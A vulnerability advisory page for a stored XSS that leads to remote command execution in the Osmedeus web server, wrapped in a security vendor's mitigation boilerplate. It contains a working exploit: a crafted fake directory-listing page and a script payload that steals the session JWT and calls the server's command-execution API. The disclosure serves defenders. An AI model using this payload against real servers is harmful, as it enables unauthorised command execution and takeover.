Your RSA-2048 keys break in 2030. Find every one of them before attackers do.See CBOMkit
🐹 Go
GHSA-wvv7-wm5v-w2gv
Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE
Published
Nov 5, 2024
Updated
Nov 6, 2024
Affected
1 pkg
Patched
None yet
Exploits
None indexed
EPSS Exploitation Probability
0.4%probability of exploitation in next 30 days
Lower Risk35th percentile+0.26%
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
🐹
github.com/j3ssie/osmedeusReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md template.
<p align="center">
<a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
<br />
<br />
<strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{CurrentDay}}</em></strong>
<p align="center">
<a href="https://docs.osmedeus.org/"><img src="https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge&logo=GitBook&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://docs.osmedeus.org/donation/"><img src="https://img.shields.io/badge/Donation-0078D4?style=for-the-badge&logo=GitHub-Sponsors&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://twitter.com/OsmedeusEngine"><img src="https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge&logo=Twitter&logoColor=39ff14&labelColor=black&color=black"></a>
</p>
</p>
## Scan Information
<scanInfo />
***
## 🚀 Subdomains
<content src="{{Output}}/subdomain/final-{{Workspace}}.txt" shorten=true />
***
## 🌐 HTTP Fingerprint
<content src="{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt" />
***
## 🐞 Vulnerability
### List of Vulnerability Reports
- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)
- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)
- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)
### Jaeles Scan
<content src="{{Output}}/vuln/active/jaeles-summary.txt" />
<content src="{{Output}}/vuln/sensitive/jaeles-summary.txt" />
***
### Nuclei Scan
<content src="{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt" />
***
## 🕷️ Spider Content
<content src="{{Output}}/linkfinding/links-{{Workspace}}.txt"/>
***
## 📃 Content Discovery
<content src="{{Output}}/directory/unique-beautify-{{Workspace}}.txt" />
***
## 🔍 Port Scan
<content src="{{Output}}/portscan/open-ports.txt" />
***
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS The issue starts with processing the <content> tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
- Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
- len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
- It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on <a> tags ⇒ We can create custom payloads by leveraging this mechanism."
<! -- Fake Index Content -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="?abc=<script>alert(1)</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
- Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit
- Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="675559605-1278d133b090b74129f65f6d108d2c83.pdf">675559605-1278d133b090b74129f65f6d108d2c83.pdf</a></li>
<li><a href="959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe">959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe</a></li>
<li><a href="%5BMS-DOCX%5D-240416.docx">[MS-DOCX]-240416.docx</a></li>
<li><a href="AnyDesk.exe">AnyDesk.exe</a></li>
<li><a href="Attachment.zip">Attachment.zip</a></li>
<li><a href="barker.tar">barker.tar</a></li>
<li><a href="c1awptpm_1721182413858.pdf">c1awptpm_1721182413858.pdf</a></li>
<li><a href="cacert.der">cacert.der</a></li>
<li><a href="caido-desktop-logs-1729480323.zip">caido-desktop-logs-1729480323.zip</a></li>
<li><a href="caido-desktop-v0.41.0-win-x86_64.exe">caido-desktop-v0.41.0-win-x86_64.exe</a></li>
<li><a href="caido-desktop-v0.42.0-win-x86_64.exe">caido-desktop-v0.42.0-win-x86_64.exe</a></li>
<li><a href="cdd">cdd</a></li>
<li><a href="CentOS-7-live-GNOME-x86_64.iso">CentOS-7-live-GNOME-x86_64.iso</a></li>
<li><a href="chrome-integrate.zip">chrome-integrate.zip</a></li>
<li><a href="ChromeSetup.exe">ChromeSetup.exe</a></li>
<li><a href="Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf">Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf</a></li>
<li><a href="CxSAST.950.Release.Setup_9.5.0.100.7z">CxSAST.950.Release.Setup_9.5.0.100.7z</a></li>
<li><a href="C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf">CÁC QUY ĐỊNH & TIÊU CHUẨN CẦN BIẾT CHO DOANH NGHIỆP NHỰA XUẤT KHẨU VÀO EU.pdf</a></li>
<li><a href="Danh%20sach%20may%20chu%20T18.xlsx">Danh sach may chu T18.xlsx</a></li>
<li><a href="de4dot-net45.zip">de4dot-net45.zip</a></li>
<li><a href="de4dot-netcoreapp3.1.zip">de4dot-netcoreapp3.1.zip</a></li>
<li><a href="desktop.ini">desktop.ini</a></li>
<li><a href="disk-1.KkwpoIcO.vmdk.part">disk-1.KkwpoIcO.vmdk.part</a></li>
<li><a href="disk-1.vmdk">disk-1.vmdk</a></li>
<li><a href="dist.zip">dist.zip</a></li>
<li><a href="dnSpy-net-win64.zip">dnSpy-net-win64.zip</a></li>
<li><a href="doc.9.1.0.rar">doc.9.1.0.rar</a></li>
<li><a href="download">download</a></li>
<li><a href="Earned_Achievements_2024-09-16.pdf">Earned_Achievements_2024-09-16.pdf</a></li>
<li><a href="Eazfuscator.NET%202024.1%20Setup.msi">Eazfuscator.NET 2024.1 Setup.msi</a></li>
<li><a href="flare-ida-master.zip">flare-ida-master.zip</a></li>
<li><a href="gitlab-recovery-codes.txt">gitlab-recovery-codes.txt</a></li>
<li><a href="Hacking%20Rust.pdf">Hacking Rust.pdf</a></li>
<li><a href="Huong%20dan%20cai%20dat%20Oracle%20New.docx">Huong dan cai dat Oracle New.docx</a></li>
<li><a href="ida83_sdk_tools_v2.zip">ida83_sdk_tools_v2.zip</a></li>
<li><a href="ida84_sdk_tools.zip">ida84_sdk_tools.zip</a></li>
<li><a href="IDARustDemangler.py">IDARustDemangler.py</a></li>
<li><a href="idb2pat.py">idb2pat.py</a></li>
<li><a href="incident-notification_26.03.2024-2.pdf">incident-notification_26.03.2024-2.pdf</a></li>
<li><a href="ironword.2024.8.3.nupkg">ironword.2024.8.3.nupkg</a></li>
<li><a href="KCSC_Recruitment.pdf">KCSC_Recruitment.pdf</a></li>
<li><a href="K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx">Kế hoạch đào tạo 05102023 (2).xlsx</a></li>
<li><a href="linkfinder.json">linkfinder.json</a></li>
<li><a href="Margherita%20Report%20Demo_report.pdf">Margherita Report Demo_report.pdf</a></li>
<li><a href="Mastering_Malware_Analysis.pdf">Mastering_Malware_Analysis.pdf</a></li>
<li><a href="M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx">Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx</a></li>
<li><a href="node-v20.17.0-x64.msi">node-v20.17.0-x64.msi</a></li>
<li><a href="OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip">OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip</a></li>
<li><a href="OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf">OSED Notes Study Overview by Joas Antonio.pdf</a></li>
<li><a href="PAKD%20paytech.xlsx">PAKD paytech.xlsx</a></li>
<li><a href="password">password</a></li>
<li><a href="patriotctf.rar">patriotctf.rar</a></li>
<li><a href="pestudio-9.59.zip">pestudio-9.59.zip</a></li>
<li><a href="photo_2023-01-04_09-04-52.jpg">photo_2023-01-04_09-04-52.jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55%20%282%29.jpg">photo_2023-01-04_09-04-55 (2).jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55.jpg">photo_2023-01-04_09-04-55.jpg</a></li>
<li><a href="photo_2024-09-27_09-47-55.jpg">photo_2024-09-27_09-47-55.jpg</a></li>
<li><a href="Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx">Phụ lục 5.xlsx</a></li>
<li><a href="plugin.zip">plugin.zip</a></li>
<li><a href="processhacker-2.39-setup.exe">processhacker-2.39-setup.exe</a></li>
<li><a href="publications.pdf">publications.pdf</a></li>
<li><a href="pwnfox.json">pwnfox.json</a></li>
<li><a href="pykd_ext_2.0.0.25.zip">pykd_ext_2.0.0.25.zip</a></li>
<li><a href="rp-win.zip">rp-win.zip</a></li>
<li><a href="rs.zip">rs.zip</a></li>
<li><a href="rustup-init.exe">rustup-init.exe</a></li>
<li><a href="setup.exe">setup.exe</a></li>
<li><a href="Single%20Page%20Applications%20with%20Vue.js.rar">Single Page Applications with Vue.js.rar</a></li>
<li><a href="Skilled_Person_Registration_Template_2pWPpnl.xlsx">Skilled_Person_Registration_Template_2pWPpnl.xlsx</a></li>
<li><a href="snapshot_2024-10-03_12-14.zip">snapshot_2024-10-03_12-14.zip</a></li>
<li><a href="spire.doc.12.7.3.nupkg">spire.doc.12.7.3.nupkg</a></li>
<li><a href="spire.doc.9.1.0.nupkg">spire.doc.9.1.0.nupkg</a></li>
<li><a href="spire.doc.cpp.11.4.5.nupkg">spire.doc.cpp.11.4.5.nupkg</a></li>
<li><a href="sticker.webm">sticker.webm</a></li>
<li><a href="Telegram%20Desktop/">Telegram Desktop/</a></li>
<li><a href="test">test</a></li>
<li><a href="test.php">test.php</a></li>
<li><a href="test2">test2</a></li>
<li><a href="test1.php">test1.php</a></li>
<li><a href="test2.php">test2.php</a></li>
<li><a href="test3.php">test3.php</a></li>
<li><a href="test4.php">test4.php</a></li>
<li><a href="test5.php">test5.php</a></li>
<li><a href="test6.php">test6.php</a></li>
<li><a href="test7.php">test7.php</a></li>
<li><a href="test8.php">test8.php</a></li>
<li><a href="test9.php">test9.php</a></li>
<li><a href="test10.php">test10.php</a></li>
<li><a href="test11.php">test11.php</a></li>
<li><a href="test12.php">test12.php</a></li>
<li><a href="test13.php">test13.php</a></li>
<li><a href="test14.php">test14.php</a></li>
<li><a href="test15.php">test15.php</a></li>
<li><a href="test16.php">test16.php</a></li>
<li><a href="test17.php">test17.php</a></li>
<li><a href="test18.php">test18.php</a></li>
<li><a href="test19.php">test19.php</a></li>
<li><a href="test20.php">test20.php</a></li>
<li><a href="test21.php">test21.php</a></li>
<li><a href="test22.php">test22.php</a></li>
<li><a href="test23.php">test23.php</a></li>
<li><a href="test24.php">test24.php</a></li>
<li><a href="test25.php">test25.php</a></li>
<li><a href="test26.php">test26.php</a></li>
<li><a href="test27.php">test27.php</a></li>
<li><a href="test28.php">test28.php</a></li>
<li><a href="test29.php">test29.php</a></li>
<li><a href="test30.php">test30.php</a></li>
<li><a href="test31.php">test31.php</a></li>
<li><a href="test32.php">test32.php</a></li>
<li><a href="test33.php">test33.php</a></li>
<li><a href="test34.php">test34.php</a></li>
<li><a href="test35.php">test35.php</a></li>
<li><a href="test36.php">test36.php</a></li>
<li><a href="test37.php">test37.php</a></li>
<li><a href="test38.php">test38.php</a></li>
<li><a href="test39.php">test39.php</a></li>
<li><a href="test40.php">test40.php</a></li>
<li><a href="test41.php">test41.php</a></li>
<li><a href="test42.php">test42.php</a></li>
<li><a href="test43.php">test43.php</a></li>
<li><a href="test44.php">test44.php</a></li>
<li><a href="test45.php">test45.php</a></li>
<li><a href="test46.php">test46.php</a></li>
<li><a href="test47.php">test47.php</a></li>
<li><a href="test48.php">test48.php</a></li>
<li><a href="test49.php">test49.php</a></li>
<li><a href="test50.php">test50.php</a></li>
<li><a href="test51.php">test51.php</a></li>
<li><a href="test52.php">test52.php</a></li>
<li><a href="test53.php">test53.php</a></li>
<li><a href="test54.php">test54.php</a></li>
<li><a href="test55.php">test55.php</a></li>
<li><a href="test56.php">test56.php</a></li>
<li><a href="test57.php">test57.php</a></li>
<li><a href="test58.php">test58.php</a></li>
<li><a href="test59.php">test59.php</a></li>
<li><a href="test60.php">test60.php</a></li>
<li><a href="test61.php">test61.php</a></li>
<li><a href="test62.php">test62.php</a></li>
<li><a href="test63.php">test63.php</a></li>
<li><a href="test64.php">test64.php</a></li>
<li><a href="test65.php">test65.php</a></li>
<li><a href="test66.php">test66.php</a></li>
<li><a href="test67.php">test67.php</a></li>
<li><a href="test68.php">test68.php</a></li>
<li><a href="test69.php">test69.php</a></li>
<li><a href="test70.php">test70.php</a></li>
<li><a href="test71.php">test71.php</a></li>
<li><a href="test72.php">test72.php</a></li>
<li><a href="test73.php">test73.php</a></li>
<li><a href="test74.php">test74.php</a></li>
<li><a href="test75.php">test75.php</a></li>
<li><a href="test76.php">test76.php</a></li>
<li><a href="test77.php">test77.php</a></li>
<li><a href="test78.php">test78.php</a></li>
<li><a href="test79.php">test79.php</a></li>
<li><a href="test80.php">test80.php</a></li>
<li><a href="test81.php">test81.php</a></li>
<li><a href="test82.php">test82.php</a></li>
<li><a href="test83.php">test83.php</a></li>
<li><a href="test84.php">test84.php</a></li>
<li><a href="test85.php">test85.php</a></li>
<li><a href="test86.php">test86.php</a></li>
<li><a href="test87.php">test87.php</a></li>
<li><a href="test88.php">test88.php</a></li>
<li><a href="test89.php">test89.php</a></li>
<li><a href="test90.php">test90.php</a></li>
<li><a href="test91.php">test91.php</a></li>
<li><a href="test92.php">test92.php</a></li>
<li><a href="test93.php">test93.php</a></li>
<li><a href="test94.php">test94.php</a></li>
<li><a href="test95.php">test95.php</a></li>
<li><a href="test96.php">test96.php</a></li>
<li><a href="test97.php">test97.php</a></li>
<li><a href="test98.php">test98.php</a></li>
<li><a href="test99.php">test99.php</a></li>
<li><a href="test100.php">test100.php</a></li>
<li><a href="test101.php">test101.php</a></li>
<li><a href="test102.php">test102.php</a></li>
<li><a href="test103.php">test103.php</a></li>
<li><a href="test104.php">test104.php</a></li>
<li><a href="test105.php">test105.php</a></li>
<li><a href="test106.php">test106.php</a></li>
<li><a href="test107.php">test107.php</a></li>
<li><a href="test108.php">test108.php</a></li>
<li><a href="test109.php">test109.php</a></li>
<li><a href="test110.php">test110.php</a></li>
<li><a href="test111.php">test111.php</a></li>
<li><a href="test112.php">test112.php</a></li>
<li><a href="test113.php">test113.php</a></li>
<li><a href="test114.php">test114.php</a></li>
<li><a href="test115.php">test115.php</a></li>
<li><a href="test116.php">test116.php</a></li>
<li><a href="test117.php">test117.php</a></li>
<li><a href="test118.php">test118.php</a></li>
<li><a href="test119.php">test119.php</a></li>
<li><a href="test120.php">test120.php</a></li>
<li><a href="test121.php">test121.php</a></li>
<li><a href="test122.php">test122.php</a></li>
<li><a href="test123.php">test123.php</a></li>
<li><a href="test124.php">test124.php</a></li>
<li><a href="test125.php">test125.php</a></li>
<li><a href="test126.php">test126.php</a></li>
<li><a href="test127.php">test127.php</a></li>
<li><a href="test128.php">test128.php</a></li>
<li><a href="test129.php">test129.php</a></li>
<li><a href="test130.php">test130.php</a></li>
<li><a href="test131.php">test131.php</a></li>
<li><a href="test132.php">test132.php</a></li>
<li><a href="test133.php">test133.php</a></li>
<li><a href="test134.php">test134.php</a></li>
<li><a href="test135.php">test135.php</a></li>
<li><a href="test136.php">test136.php</a></li>
<li><a href="test137.php">test137.php</a></li>
<li><a href="test138.php">test138.php</a></li>
<li><a href="test139.php">test139.php</a></li>
<li><a href="test140.php">test140.php</a></li>
<li><a href="test141.php">test141.php</a></li>
<li><a href="test142.php">test142.php</a></li>
<li><a href="test143.php">test143.php</a></li>
<li><a href="test144.php">test144.php</a></li>
<li><a href="test145.php">test145.php</a></li>
<li><a href="test146.php">test146.php</a></li>
<li><a href="test147.php">test147.php</a></li>
<li><a href="test148.php">test148.php</a></li>
<li><a href="test149.php">test149.php</a></li>
<li><a href="test150.php">test150.php</a></li>
<li><a href="test151.php">test151.php</a></li>
<li><a href="test152.php">test152.php</a></li>
<li><a href="test153.php">test153.php</a></li>
<li><a href="test154.php">test154.php</a></li>
<li><a href="test155.php">test155.php</a></li>
<li><a href="test156.php">test156.php</a></li>
<li><a href="test157.php">test157.php</a></li>
<li><a href="test158.php">test158.php</a></li>
<li><a href="test159.php">test159.php</a></li>
<li><a href="test160.php">test160.php</a></li>
<li><a href="test161.php">test161.php</a></li>
<li><a href="test162.php">test162.php</a></li>
<li><a href="test163.php">test163.php</a></li>
<li><a href="test164.php">test164.php</a></li>
<li><a href="test165.php">test165.php</a></li>
<li><a href="test166.php">test166.php</a></li>
<li><a href="test167.php">test167.php</a></li>
<li><a href="test168.php">test168.php</a></li>
<li><a href="test169.php">test169.php</a></li>
<li><a href="test170.php">test170.php</a></li>
<li><a href="test171.php">test171.php</a></li>
<li><a href="test172.php">test172.php</a></li>
<li><a href="test173.php">test173.php</a></li>
<li><a href="test174.php">test174.php</a></li>
<li><a href="test175.php">test175.php</a></li>
<li><a href="test176.php">test176.php</a></li>
<li><a href="test177.php">test177.php</a></li>
<li><a href="test178.php">test178.php</a></li>
<li><a href="test179.php">test179.php</a></li>
<li><a href="test180.php">test180.php</a></li>
<li><a href="test181.php">test181.php</a></li>
<li><a href="test182.php">test182.php</a></li>
<li><a href="test183.php">test183.php</a></li>
<li><a href="test184.php">test184.php</a></li>
<li><a href="test185.php">test185.php</a></li>
<li><a href="test186.php">test186.php</a></li>
<li><a href="test187.php">test187.php</a></li>
<li><a href="test188.php">test188.php</a></li>
<li><a href="test189.php">test189.php</a></li>
<li><a href="test190.php">test190.php</a></li>
<li><a href="test191.php">test191.php</a></li>
<li><a href="test192.php">test192.php</a></li>
<li><a href="test193.php">test193.php</a></li>
<li><a href="test194.php">test194.php</a></li>
<li><a href="test195.php">test195.php</a></li>
<li><a href="test196.php">test196.php</a></li>
<li><a href="test197.php">test197.php</a></li>
<li><a href="test198.php">test198.php</a></li>
<li><a href="test199.php">test199.php</a></li>
<li><a href="test200.php">test200.php</a></li>
<li><a href="test201.php">test201.php</a></li>
<li><a href="test202.php">test202.php</a></li>
<li><a href="test203.php">test203.php</a></li>
<li><a href="test204.php">test204.php</a></li>
<li><a href="test205.php">test205.php</a></li>
<li><a href="test206.php">test206.php</a></li>
<li><a href="test207.php">test207.php</a></li>
<li><a href="test208.php">test208.php</a></li>
<li><a href="test209.php">test209.php</a></li>
<li><a href="test210.php">test210.php</a></li>
<li><a href="test211.php">test211.php</a></li>
<li><a href="test212.php">test212.php</a></li>
<li><a href="test213.php">test213.php</a></li>
<li><a href="test214.php">test214.php</a></li>
<li><a href="test215.php">test215.php</a></li>
<li><a href="test216.php">test216.php</a></li>
<li><a href="test217.php">test217.php</a></li>
<li><a href="test218.php">test218.php</a></li>
<li><a href="test219.php">test219.php</a></li>
<li><a href="test220.php">test220.php</a></li>
<li><a href="test221.php">test221.php</a></li>
<li><a href="test222.php">test222.php</a></li>
<li><a href="test223.php">test223.php</a></li>
<li><a href="test224.php">test224.php</a></li>
<li><a href="test225.php">test225.php</a></li>
<li><a href="test226.php">test226.php</a></li>
<li><a href="test227.php">test227.php</a></li>
<li><a href="test228.php">test228.php</a></li>
<li><a href="test229.php">test229.php</a></li>
<li><a href="test230.php">test230.php</a></li>
<li><a href="test231.php">test231.php</a></li>
<li><a href="test232.php">test232.php</a></li>
<li><a href="test233.php">test233.php</a></li>
<li><a href="test234.php">test234.php</a></li>
<li><a href="test235.php">test235.php</a></li>
<li><a href="test236.php">test236.php</a></li>
<li><a href="test237.php">test237.php</a></li>
<li><a href="test238.php">test238.php</a></li>
<li><a href="test239.php">test239.php</a></li>
<li><a href="test240.php">test240.php</a></li>
<li><a href="test241.php">test241.php</a></li>
<li><a href="test242.php">test242.php</a></li>
<li><a href="test243.php">test243.php</a></li>
<li><a href="test244.php">test244.php</a></li>
<li><a href="test245.php">test245.php</a></li>
<li><a href="test246.php">test246.php</a></li>
<li><a href="test247.php">test247.php</a></li>
<li><a href="test248.php">test248.php</a></li>
<li><a href="test249.php">test249.php</a></li>
<li><a href="test250.php">test250.php</a></li>
<li><a href="test251.php">test251.php</a></li>
<li><a href="test252.php">test252.php</a></li>
<li><a href="test253.php">test253.php</a></li>
<li><a href="test254.php">test254.php</a></li>
<li><a href="test255.php">test255.php</a></li>
<li><a href="test256.php">test256.php</a></li>
<li><a href="test257.php">test257.php</a></li>
<li><a href="test258.php">test258.php</a></li>
<li><a href="test259.php">test259.php</a></li>
<li><a href="test260.php">test260.php</a></li>
<li><a href="test261.php">test261.php</a></li>
<li><a href="test262.php">test262.php</a></li>
<li><a href="test263.php">test263.php</a></li>
<li><a href="test264.php">test264.php</a></li>
<li><a href="test265.php">test265.php</a></li>
<li><a href="test266.php">test266.php</a></li>
<li><a href="test267.php">test267.php</a></li>
<li><a href="test268.php">test268.php</a></li>
<li><a href="test269.php">test269.php</a></li>
<li><a href="test270.php">test270.php</a></li>
<li><a href="test271.php">test271.php</a></li>
<li><a href="test272.php">test272.php</a></li>
<li><a href="test273.php">test273.php</a></li>
<li><a href="test274.php">test274.php</a></li>
<li><a href="test275.php">test275.php</a></li>
<li><a href="test276.php">test276.php</a></li>
<li><a href="test277.php">test277.php</a></li>
<li><a href="test278.php">test278.php</a></li>
<li><a href="test279.php">test279.php</a></li>
<li><a href="test280.php">test280.php</a></li>
<li><a href="test281.php">test281.php</a></li>
<li><a href="test282.php">test282.php</a></li>
<li><a href="test283.php">test283.php</a></li>
<li><a href="test284.php">test284.php</a></li>
<li><a href="test285.php">test285.php</a></li>
<li><a href="test286.php">test286.php</a></li>
<li><a href="test287.php">test287.php</a></li>
<li><a href="test288.php">test288.php</a></li>
<li><a href="test289.php">test289.php</a></li>
<li><a href="test290.php">test290.php</a></li>
<li><a href="test291.php">test291.php</a></li>
<li><a href="test292.php">test292.php</a></li>
<li><a href="test293.php">test293.php</a></li>
<li><a href="test294.php">test294.php</a></li>
<li><a href="test295.php">test295.php</a></li>
<li><a href="test296.php">test296.php</a></li>
<li><a href="test297.php">test297.php</a></li>
<li><a href="test298.php">test298.php</a></li>
<li><a href="test299.php">test299.php</a></li>
<li><a href="test300.php">test300.php</a></li>
<li><a href="The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf">The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf</a></li>
<li><a href="ThuHo.rar">ThuHo.rar</a></li>
<li><a href="Vue.js%20Master%20Class%202024%20Edition.rar">Vue.js Master Class 2024 Edition.rar</a></li>
<li><a href="VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar">VueSchool - The Vue.js 3 Masterclass (2024-4).rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar</a></li>
<li><a href="win%20server%202016%281%29.ovf">win server 2016(1).ovf</a></li>
<li><a href="win%20server%202016.ovf">win server 2016.ovf</a></li>
<li><a href="?abc=<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
Impact
Execute command on server
Affected Packages
1 total
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/j3ssie/osmedeus | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/j3ssie/osmedeus. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of github.com/j3ssie/osmedeus has shipped for GHSA-wvv7-wm5v-w2gv yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wvv7-wm5v-w2gv is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-wvv7-wm5v-w2gv. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
### Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
### Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.
```
<p align="center">
<a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
<br />
<br />
<strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{Curre
O3 Security · Impact-Aware SCA
Is GHSA-wvv7-wm5v-w2gv in your dependencies?
O3 detects GHSA-wvv7-wm5v-w2gv across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.